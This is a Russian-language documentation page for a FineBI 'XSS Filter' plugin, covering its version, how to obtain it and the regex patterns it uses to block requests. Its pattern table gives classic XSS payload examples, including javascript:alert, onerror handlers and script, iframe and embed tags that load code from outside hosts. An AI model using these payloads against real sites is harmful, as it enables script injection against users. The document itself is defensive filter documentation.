Skip to content

Плагин XSS Filter

1. Обзор

1.1 Версия

Версия сервера FineBIВерсии плагина XSS Filter
6.0V1.0

1.2 Функциональный профиль

Установив плагин "XSS Filter", администраторы смогут эффективно решить проблему безопасности, связанную с XSS-инъекциями.

2. Установка плагина

Напишите на почту info@biconsult.ru, чтобы получить плагин.

Об установке плагинов см. раздел: Управление плагинами

Примечание: После установки плагина необходимо перезапустить проект, чтобы он вступил в силу.

3. Функциональный профиль

После установки плагина для некоторых запросов, которые могут содержать XSS-опасности, запрос перехватывается, если входные параметры содержат части, соответствующие следующему регулярному выражению:

регулярный (фигура в геометрии)типичный пример
JAVASCRIPT.<IMG SRC="javascript:alert('XSS');">
ONERROR=<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>.
ALERT(. *)<IMG SRC="javascript:alert('XSS');">
<IMG SRC<IMG SRC="javascript:alert('XSS');">
<SCRIPT SRC<SCRIPT SRC=http://xss.rocks/xss.js?\< B >
<IFRAME SRC<iframe src=http://xss.rocks/scriptlet.md <
<EMBED SRC<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>.
<A HREF<A HREF="http://IP/">XSS</A>